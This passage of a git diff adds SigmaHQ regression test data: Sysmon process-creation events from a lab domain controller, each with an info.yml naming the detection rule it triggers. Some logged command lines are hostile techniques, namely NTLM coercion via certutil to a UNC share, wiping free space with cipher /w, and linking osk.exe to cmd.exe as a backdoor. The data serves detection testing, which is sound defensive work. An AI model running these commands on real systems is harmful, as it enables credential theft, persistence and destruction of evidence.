+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-25T17:26:24.815458Z"
+ }
+ },
+ "EventRecordID": 11867155,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3308,
+ "ThreadID": 4008
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "ar-win-dc.attackrange.local",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-25 17:26:24.808",
+ "ProcessGuid": "5AA13A44-0840-68FD-1336-000000004002",
+ "ProcessId": 4424,
+ "Image": "C:\\Windows\\System32\\certutil.exe",
+ "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
+ "Description": "CertUtil.exe",
+ "Product": "Microsoft® Windows® Operating System",
+ "Company": "Microsoft Corporation",
+ "OriginalFileName": "CertUtil.exe",
+ "CommandLine": "certutil -syncwithWU \\\\10.0.1.14\\my-share",
+ "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
+ "User": "ATTACKRANGE\\Administrator",
+ "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
+ "LogonId": "0x529ae3",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "High",
+ "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
+ "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
+ "ParentProcessId": 6304,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml
new file mode 100644
index 000000000..f5243b532
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml
@@ -0,0 +1,13 @@
+id: 32397458-1d93-45ee-a3c8-9efebb81d9d1
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 6c6d9280-e6d0-4b9d-80ac-254701b64916
+ title: Potential NTLM Coercion Via Certutil.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx
new file mode 100644
index 000000000..643bec0f9
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json
new file mode 100644
index 000000000..d845f2520
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-25T17:27:26.975358Z"
+ }
+ },
+ "EventRecordID": 11886324,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3308,
+ "ThreadID": 4008
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "ar-win-dc.attackrange.local",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-25 17:27:26.974",
+ "ProcessGuid": "5AA13A44-087E-68FD-1A36-000000004002",
+ "ProcessId": 6788,
+ "Image": "C:\\Windows\\System32\\chcp.com",
+ "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
+ "Description": "Change CodePage Utility",
+ "Product": "Microsoft® Windows® Operating System",
+ "Company": "Microsoft Corporation",
+ "OriginalFileName": "CHCP.COM",
+ "CommandLine": "chcp",
+ "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
+ "User": "ATTACKRANGE\\Administrator",
+ "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
+ "LogonId": "0x529ae3",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "High",
+ "Hashes": "SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56",
+ "ParentProcessGuid": "5AA13A44-087E-68FD-1936-000000004002",
+ "ParentProcessId": 8248,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "cmd.exe /c chcp",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml
new file mode 100644
index 000000000..474b736e4
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml
@@ -0,0 +1,13 @@
+id: 30e3935a-84b4-45ad-85e2-c209c57dbfa7
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 7090adee-82e2-4269-bd59-80691e7c6338
+ title: Console CodePage Lookup Via CHCP
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx
new file mode 100644
index 000000000..940197001
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json
new file mode 100644
index 000000000..fc3726adb
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-25T17:28:28.958645Z"
+ }
+ },
+ "EventRecordID": 11905446,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3308,
+ "ThreadID": 4008
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "ar-win-dc.attackrange.local",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-25 17:28:28.957",
+ "ProcessGuid": "5AA13A44-08BC-68FD-2336-000000004002",
+ "ProcessId": 8208,
+ "Image": "C:\\Windows\\System32\\chcp.com",
+ "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
+ "Description": "Change CodePage Utility",
+ "Product": "Microsoft® Windows® Operating System",
+ "Company": "Microsoft Corporation",
+ "OriginalFileName": "CHCP.COM",
+ "CommandLine": "chcp 936",
+ "CurrentDirectory": "C:\\Users\\Administrator\\",
+ "User": "ATTACKRANGE\\Administrator",
+ "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
+ "LogonId": "0x529ae3",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "High",
+ "Hashes": "SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56",
+ "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002",
+ "ParentProcessId": 3204,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml
new file mode 100644
index 000000000..20c85ba02
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml
@@ -0,0 +1,13 @@
+id: a67c0d0c-3b40-4fef-a39d-5bd528255d90
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: c7942406-33dd-4377-a564-0f62db0593a3
+ title: Suspicious CodePage Switch Via CHCP
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx
new file mode 100644
index 000000000..a7dd2dc9b
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json
new file mode 100644
index 000000000..a8b35b385
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-25T17:32:06.432272Z"
+ }
+ },
+ "EventRecordID": 11973062,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3308,
+ "ThreadID": 4008
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "ar-win-dc.attackrange.local",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-25 17:32:06.421",
+ "ProcessGuid": "5AA13A44-0996-68FD-3A36-000000004002",
+ "ProcessId": 2876,
+ "Image": "C:\\Windows\\System32\\cipher.exe",
+ "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
+ "Description": "File Encryption Utility",
+ "Product": "Microsoft® Windows® Operating System",
+ "Company": "Microsoft Corporation",
+ "OriginalFileName": "CIPHER.EXE",
+ "CommandLine": "cipher.exe /w:C:",
+ "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
+ "User": "ATTACKRANGE\\Administrator",
+ "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
+ "LogonId": "0x529ae3",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "High",
+ "Hashes": "SHA1=5747F6E48C899AEE54E4153AC8A8B61E741F45E2,MD5=3D7D3EEDD055EFF0C7995491466A7EB7,SHA256=6E04AD8A79A7D794438E197606AB78B079929D941FE99DD5159702694F7ACE77,IMPHASH=E83B4C457AFD5EEA31874B00E8A3A956",
+ "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
+ "ParentProcessId": 6304,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml
new file mode 100644
index 000000000..a9f91c9f8
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml
@@ -0,0 +1,13 @@
+id: 18b75b44-f2a5-497f-934c-9d0941f57f0f
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 4b046706-5789-4673-b111-66f25fe99534
+ title: Deleted Data Overwritten Via Cipher.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx
new file mode 100644
index 000000000..5ef9a365c
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json
new file mode 100644
index 000000000..fdf5019a2
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-25T17:33:00.990279Z"
+ }
+ },
+ "EventRecordID": 11989935,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3308,
+ "ThreadID": 4008
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "ar-win-dc.attackrange.local",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-25 17:33:00.989",
+ "ProcessGuid": "5AA13A44-09CC-68FD-4336-000000004002",
+ "ProcessId": 1060,
+ "Image": "C:\\Windows\\System32\\clip.exe",
+ "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
+ "Description": "Clip - copies the data into clipboard",
+ "Product": "Microsoft® Windows® Operating System",
+ "Company": "Microsoft Corporation",
+ "OriginalFileName": "clip.exe",
+ "CommandLine": "clip",
+ "CurrentDirectory": "C:\\Users\\Administrator\\",
+ "User": "ATTACKRANGE\\Administrator",
+ "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
+ "LogonId": "0x529ae3",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "High",
+ "Hashes": "SHA1=F3F4BE6C6A42072CBB74D05E3EBE285FB24C56CF,MD5=61C8E9DEC5E3AEA798C2862CD4565CCA,SHA256=ABAF131EA0A608072574D7C77A6EE5175CA13E361DE18146A54A78CBD868BFF3,IMPHASH=FFEDF33A1AF6412E26F1F659C12D5FF7",
+ "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002",
+ "ParentProcessId": 3204,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml
new file mode 100644
index 000000000..7d1d79487
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml
@@ -0,0 +1,13 @@
+id: 4ea9d42e-437f-4c56-8173-bdd8cafd72be
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: ddeff553-5233-4ae9-bbab-d64d2bd634be
+ title: Data Copied To Clipboard Via Clip.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx
new file mode 100644
index 000000000..df8accd0d
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json
new file mode 100644
index 000000000..f1b1d7319
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-25T13:04:38.507492Z"
+ }
+ },
+ "EventRecordID": 8302863,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3308,
+ "ThreadID": 4008
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "ar-win-dc.attackrange.local",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-25 13:04:38.497",
+ "ProcessGuid": "5AA13A44-CAE6-68FC-A62F-000000004002",
+ "ProcessId": 7816,
+ "Image": "C:\\Windows\\System32\\cmd.exe",
+ "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)",
+ "Description": "Windows Command Processor",
+ "Product": "Microsoft® Windows® Operating System",
+ "Company": "Microsoft Corporation",
+ "OriginalFileName": "Cmd.Exe",
+ "CommandLine": "cmd /c assoc",
+ "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
+ "User": "ATTACKRANGE\\Administrator",
+ "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
+ "LogonId": "0x529ae3",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "High",
+ "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C",
+ "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
+ "ParentProcessId": 6304,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml
new file mode 100644
index 000000000..ce83d82c8
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml
@@ -0,0 +1,13 @@
+id: 1a0606d6-3470-45e5-aeea-16098357e709
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061
+ title: Change Default File Association Via Assoc
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx
new file mode 100644
index 000000000..e3402971f
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json
new file mode 100644
index 000000000..4dec20564
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:13:54.628884Z" + } + }, + "EventRecordID": 8447015, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:13:54.622", + "ProcessGuid": "5AA13A44-CD12-68FC-E62F-000000004002", + "ProcessId": 9088, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"dir /s\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml
new file mode 100644
index 000000000..dc134520f
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml
@@ -0,0 +1,13 @@
+id: 952d9279-9d38-4dc6-b32e-4b470cf99fc7
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006
+ title: File And SubFolder Enumeration Via Dir Command
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx
new file mode 100644
index 000000000..23395b22d
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json
new file mode 100644
index 000000000..7e984c958
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:15:18.885132Z" + } + }, + "EventRecordID": 8471746, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:15:18.879", + "ProcessGuid": "5AA13A44-CD66-68FC-F12F-000000004002", + "ProcessId": 8620, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"mklink C:\\Windows\\System32\\osk.exe C:\\Windows\\System32\\cmd.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": 